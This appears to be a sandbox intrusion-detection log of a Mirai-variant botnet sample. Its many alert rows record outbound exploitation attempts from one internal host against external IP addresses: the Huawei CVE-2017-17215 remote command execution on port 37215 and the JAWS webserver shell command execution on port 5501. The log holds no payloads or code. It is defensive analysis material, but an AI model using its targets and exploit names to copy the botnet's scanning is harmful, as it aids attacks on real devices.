                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234195419.8.149.775501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234195419.8.149.775501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353104186.94.140.19237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351440197.189.134.637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355314178.130.136.185501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343980156.92.33.19737215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355314178.130.136.185501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356666181.193.110.25537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353618160.65.13.14437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235388037.68.200.265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342736105.102.142.7237215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235388037.68.200.265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349232197.19.238.24137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233635685.229.94.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233635685.229.94.2325501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338664186.169.30.19237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233708281.196.81.2085501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233708281.196.81.2085501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344510101.77.7.775501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344510101.77.7.775501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334194158.159.195.2285501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334194158.159.195.2285501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360252181.182.120.13537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333530190.193.81.4637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353570186.150.217.2337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353738190.14.178.11137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234669291.119.82.645501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234669291.119.82.645501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335976156.241.93.7137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346352207.23.116.95501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233459244.103.96.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233459244.103.96.2005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346352207.23.116.95501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234355479.3.10.1535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234355479.3.10.1535501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345530186.172.151.2637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353288140.171.49.415501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233549048.182.227.1695501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233549048.182.227.1695501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353640223.98.12.13737215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353288140.171.49.415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347886186.30.221.17637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334932159.93.136.2205501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334932159.93.136.2205501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360200190.4.81.15437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340962223.36.73.12437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338256150.92.194.1085501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338256150.92.194.1085501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354572211.29.90.1455501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342822110.158.161.1805501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342822110.158.161.1805501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354572211.29.90.1455501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234442263.206.18.1355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234442263.206.18.1355501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346386190.205.73.1705501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346386190.205.73.1705501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344400156.22.146.12837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235691874.42.12.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235691874.42.12.2035501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233316849.8.41.2135501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233316849.8.41.2135501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234234288.236.46.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234234288.236.46.1145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345546200.17.222.975501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345546200.17.222.975501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23372081.108.173.2475501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235470641.174.83.1415501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235470641.174.83.1415501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349156160.154.121.24037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23538101.163.69.2325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23538101.163.69.2325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235262887.217.164.1995501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235262887.217.164.1995501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338564105.204.210.17637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344338210.206.50.545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344338210.206.50.545501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334426199.6.78.295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334426199.6.78.295501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356886102.60.222.23437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335248156.141.100.14337215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23372081.108.173.2475501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235968641.120.156.5137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352970216.45.65.85501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352970216.45.65.85501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344338102.145.65.3937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359240197.120.101.2525501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235606652.228.15.755501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359240197.120.101.2525501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233425441.78.210.22037215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235606652.228.15.755501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234991623.129.195.1175501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357506210.197.246.1395501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357506210.197.246.1395501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354538186.158.148.3337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356696181.195.83.19337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342308186.206.135.20637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342126156.199.210.4537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233957841.169.95.22737215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234991623.129.195.1175501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358040102.120.28.12037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23590944.191.192.1145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23590944.191.192.1145501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341710197.10.65.16237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352072102.127.41.14737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334286223.146.225.21937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345120105.118.54.16437215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335384110.134.196.1845501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335384110.134.196.1845501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360722197.42.188.23037215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234453896.254.227.1005501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234453896.254.227.1005501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234294678.3.18.1395501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234294678.3.18.1395501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233419671.237.90.1485501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356710181.188.51.8437215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233419671.237.90.1485501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339554197.122.184.9337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357356105.193.177.13837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234181293.217.17.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234181293.217.17.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348332118.197.192.1135501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360606105.221.146.23337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358390223.62.129.4537215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348332118.197.192.1135501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346310132.189.214.335501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346310132.189.214.335501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358526105.190.120.14237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23530204.79.100.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23530204.79.100.745501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348202105.56.161.24637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235306051.81.236.315501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235306051.81.236.315501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346368186.239.31.18337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353288118.167.133.1075501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353288118.167.133.1075501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356512212.25.225.2355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356512212.25.225.2355501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334658160.20.153.19337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357426141.118.44.1915501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357426141.118.44.1915501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235257054.91.150.2365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235257054.91.150.2365501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358786105.25.35.11437215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339832160.5.69.21337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23515928.184.110.1755501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23515928.184.110.1755501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346284156.156.58.4737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353132105.61.16.17237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337668186.30.181.21137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353428197.238.142.10537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339140186.245.135.22637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354640119.92.21.2295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354640119.92.21.2295501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342058104.39.26.1545501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342058104.39.26.1545501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235782436.45.4.365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235782436.45.4.365501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357142170.92.18.1585501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357142170.92.18.1585501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360970186.81.187.16937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332986205.41.251.2485501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332986205.41.251.2485501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233549459.70.118.1375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233549459.70.118.1375501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341656102.224.179.14737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336170183.132.190.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336170183.132.190.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234932847.19.57.2155501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350520168.97.175.145501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234932847.19.57.2155501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350520168.97.175.145501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235136277.51.93.2295501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235136277.51.93.2295501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235366441.195.8.337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349076197.222.176.8637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335466201.174.21.2215501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335466201.174.21.2215501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233508448.66.156.325501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353570189.197.210.865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233508448.66.156.325501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353570189.197.210.865501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357678135.167.202.1695501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357678135.167.202.1695501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349978207.50.163.485501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349978207.50.163.485501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359446160.171.52.21937215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347268186.18.227.17737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235315299.140.89.255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235315299.140.89.255501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360692160.233.180.13937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234415432.110.89.1355501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234415432.110.89.1355501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355824157.36.23.19237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348942171.118.48.2255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348942171.118.48.2255501TCP
